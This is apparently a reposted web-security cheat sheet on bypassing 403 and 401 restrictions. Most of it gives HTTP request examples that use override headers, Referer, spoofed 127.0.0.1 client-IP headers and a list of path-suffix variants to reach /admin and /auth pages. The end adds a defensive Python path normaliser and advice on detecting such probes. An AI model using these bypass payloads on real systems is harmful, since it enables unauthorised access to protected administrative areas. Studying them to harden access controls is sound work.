Using other ports
Scan the host's ports and look for other ports serving an open web service; access the application through that port instead.
Modifying the Host header
Change the Host value to a subdomain or to the IP address to get around the restriction.
Overriding the request URL
Try the X-Original-URL and X-Rewrite-URL headers to bypass the web server's restriction.
Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden
Request
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK
or
Request
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK
Referer header bypass
Try the Referer header to bypass the web server's restriction.
Background: the Referer request header carries the address of the page the current request came from, meaning the current page was reached through a link on that page; the server side commonly uses the Referer header to identify where a visit originated.
Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden
Request
GET / HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK
or
Request
GET /auth/login HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK
Proxy IP
Developers commonly restrict access to an interface by identifying the client IP behind an Nginx proxy; try headers such as X-Forwarded-For and X-Forwared-Host to bypass the web server's restriction.
- X-Originating-IP: 127.0.0.1
- X-Remote-IP: 127.0.0.1
- X-Client-IP: 127.0.0.1
- X-Forwarded-For: 127.0.0.1
- X-Forwared-Host: 127.0.0.1
- X-Host: 127.0.0.1
- X-Custom-IP-Authorization: 127.0.0.1
Example:
Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized
Request
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK
Path suffix bypass
Variations on the path suffix, used to get past a 403-restricted directory.
site.com/admin => 403
site.com/admin/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/*/ => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin?? => 200
site.com/admin??? => 200
site.com/admin..;/ => 200
site.com/admin/..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin%20/ => 200
site.com/admin%09/ => 200
site.com/%20admin%20/ => 200
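From the defender's side, every trick above (override headers, client-supplied IP headers, Referer, and the path-suffix variants) works only when the access-control decision is made on a value the client controls. The following is an added example, not code from the original article: a Python normaliser that canonicalises the path the way a backend would and ignores the spoofable headers before deciding. The protected prefixes, the internal IP allowlist and the proxy address are assumed values for the demo.

```python
from urllib.parse import unquote
import posixpath

PROTECTED = ("/admin", "/auth")      # assumed: prefixes that need an internal client
INTERNAL_IPS = {"127.0.0.1"}         # assumed: the only address allowed in
TRUSTED_PROXY = "10.0.0.5"           # assumed: address of the nginx reverse proxy
OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")
CLIENT_IP_HEADERS = ("x-forwarded-for", "x-originating-ip", "x-remote-ip",
                     "x-client-ip", "x-forwared-host", "x-forwarded-host",
                     "x-host", "x-custom-ip-authorization")


def canonical_path(raw: str) -> str:
    """Reduce a request target to the path the backend will really serve."""
    path = raw.split("?", 1)[0]              # "/admin??" -> "/admin"
    for _ in range(2):                       # "%252e" -> "%2e" -> "."
        path = unquote(path)
    segs = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0].strip()   # "..;" -> "..", "admin\t" -> "admin"
        if seg:                              # drops the empty parts of "//"
            segs.append(seg)
    return posixpath.normpath("/" + "/".join(segs))   # resolves "." and ".."


def is_protected(path: str) -> bool:
    return any(path == p or path.startswith(p + "/") for p in PROTECTED)


def authorize(target: str, headers: dict, peer_ip: str) -> dict:
    """Decide on the canonical path and a client IP the peer cannot forge."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    notes = []
    # 1. URL-override headers never replace the request line.
    for h in OVERRIDE_HEADERS:
        if h in hdrs:
            notes.append(f"ignored {h}={hdrs[h]}")
    # 2. Only the entry our own proxy appended (the last one) to X-Forwarded-For
    #    is trusted; every other IP-bearing header is client-controlled and ignored.
    client_ip = peer_ip
    if peer_ip == TRUSTED_PROXY and "x-forwarded-for" in hdrs:
        client_ip = hdrs["x-forwarded-for"].split(",")[-1].strip()
    for h in CLIENT_IP_HEADERS:
        if h in hdrs and not (h == "x-forwarded-for" and peer_ip == TRUSTED_PROXY):
            notes.append(f"ignored {h}={hdrs[h]}")
    # 3. Referer is never consulted: it is advisory and fully client-controlled.
    path = canonical_path(target)
    allowed = not is_protected(path) or client_ip in INTERNAL_IPS
    if not allowed:
        notes.append(f"denied {target!r} -> {path!r} from {client_ip}")
    return {"allowed": allowed, "path": path, "client_ip": client_ip, "notes": notes}
```

The `notes` list is what you would ship to the SIEM: an override or IP header arriving from a non-proxy peer is a reliable signal that someone is probing the restriction.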
Reference: https://www.wangan.com/articles/2483
Please credit the source when reposting; link to this article: https://www.uj5u.com/ruanti/413342.html
